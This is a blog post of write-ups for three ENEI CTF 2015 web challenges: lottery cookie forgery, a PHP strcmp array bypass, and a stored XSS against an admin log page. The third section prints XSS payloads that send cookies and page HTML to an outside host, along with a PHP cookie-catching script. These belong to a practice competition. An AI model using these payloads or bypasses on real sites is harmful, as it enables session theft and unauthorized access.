ENEI CTF 2015 - Writeups


Posted by 0xacb on September 21, 2015 · 4 mins read


1 - Endless Lottery

We found this web site http://enei-x.dei.uc.pt/webhack3/ that is claiming to offer a prize when someone rolls the right number, but it's all a scam. Can you break the system to win the prize?!

The page looks like this:

Welcome to our lottery.

By visiting our page form time to time you get a chance of winning 10.0000 jelly beans!

Winning ticket: 1337500001 your ticket: 1337810218

Better luck next time... :(

The cookie changes when the page is refreshed, using a new browser session. In this session, my cookie was lotinfo="706:MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=". The second part of lotinfo seems to be a base64 encoded string.

$ base64 -d

Now, we have some kind of hash, 32 digits long. It can be a message-digest hash. Let's try to encrypt the ticket using the MD5 algorithm.

$ md5

Nice! Now, we know that cookie = random_ID:base64(md5(ticket)). Since our goal is to win the lottery, all we need to do is to change the session cookie, using the winning ticket.

$ md5
$ base64


Ok you win! Flag: 2d0ad06ff8349797176aad77e10edde031ec8c82

2 - Plain Auth

A friend has a service online and he says that he will never get hacked with his new bullet proof authentication mechanism. Can you prove him wrong?

This was the login page (it's not working since I'm not running PHP):

When we submit the form, a new message shows up:

Let's try to search for strcmp vulnerabilities. The strcmp (string $str1, string $str2) function returns 0 if $str1 and $str2 are equal. When we inject an array in the GET password parameter we can bypass this comparison: index.php?password[]

\o/ Flag: 421c88ff643a053d2abf6b56936093a8cc5d5630

3 - Webhack 3

By analyzing some hack attempts in our HTTP logs we found a few scripts and those led us to an admin interface from our friend hacker. Can you get us inside?

This was the login page (it's not working since i'm not running the backend):

When we try to login using a random username and password the following message appears:

"An admin will track you by your IP"
Interesting... Let's try to steal some cookies! We need to set up a page to catch the cookie. I'm going to use PHP:

$data = $_GET['data'];
$f = fopen("log.txt", "a");
fwrite($f, $data."\n");

Let's inject a script in the username: <script>document.location("http://my-php-host/catch.php?data=" + document.cookie);</script>

Suddenly, this hint pops up:

Let's try to get the document HTML: <script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script>. It worked!


<head></head><body><p>remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a </p><table class="table"><thead><tr><th>IP Address</th><th>Username</th><th>Password</th></tr></thead><tbody><tr><td></td><td>Xiene1337</td><td>185de54b5a6fd960f48666edfa41e6c6</td></tr><tr><td></td><td>Xiene1337</td><td>707d14da58ce62c08bba543fa62fe638</td></tr><tr><td></td><td>Xiene1337</td><td>74dade10c776b5ab3caf8cedb06860fb</td></tr><tr><td></td><td>script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script></td></tr></tbody></table></body>

This HTML code looks like this:

remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a

IP AddressUsernamePassword

If we try to login using the username Xiene1337 and setting document.cookie="token=2272d26a38bc90570d633e7b3508c67a" a new message appears:

The passwords in the log table may be MD5 hashes. Let's try to find them in MD5 databases.

MD5 HashOriginal password

These passwords were mistyped by Xiene1337, since they are very similar. To find the correct password, just look to your keyboard! The correct password is ljbo.

\o/ Flag: 7b88396a68feaa7aa3c388227d749097cfbf99fe